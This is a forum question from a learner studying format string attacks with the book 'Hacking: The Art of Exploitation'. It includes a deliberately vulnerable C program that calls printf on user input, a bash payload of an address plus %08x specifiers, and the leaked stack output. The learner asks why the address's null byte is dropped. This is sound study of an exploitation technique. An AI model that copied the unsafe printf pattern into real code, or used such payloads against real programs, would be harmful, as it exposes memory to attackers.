I am studying format string attack from my book Hacking: The Art of Exploitation. I have this little program, and this is the code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]) {
char text[1024];
static int test_val = -72;
if(argc < 2) {
printf("Usage: %s <text to print>\n", argv[0]);
exit(0);
}
strcpy(text, argv[1]);
printf("The right way to print user-controlled input:\n");
printf("%s", text);
printf("\nThe wrong way to print user-controlled input:\n");
printf(text);
printf("\n");
printf("[*] test_val @ 0x%016x = %d 0x%08x\n", &test_val, test_val, test_val);
exit(0);
}
I want to enter the address in my program and print it. Address 0x00600b98due to the small byte order of input bytes i"\x98\x0b\x60\x00"
this is my bash code:
./fmt_vuln $(python -c 'print "\x98\x0b\x60\x00"')%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
But the problem is that the first address (\ x00) becomes zero and is not entered to my address, and when memory is printed, it becomes 25600b98. So my question is why this problem occurs and how to enter the address 00?
This is the conclusion:
The right way to print user-controlled input:
`%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
The wrong way to print user-controlled input:
`f7ff5000.f7dd7970.f7b128c0.f7fd8700.0000002b.ffffe3b8.f7ddb72d.25600b98.
[*] test_val @ 0x0000000000600b98 = -72 0xffffffb8
source
share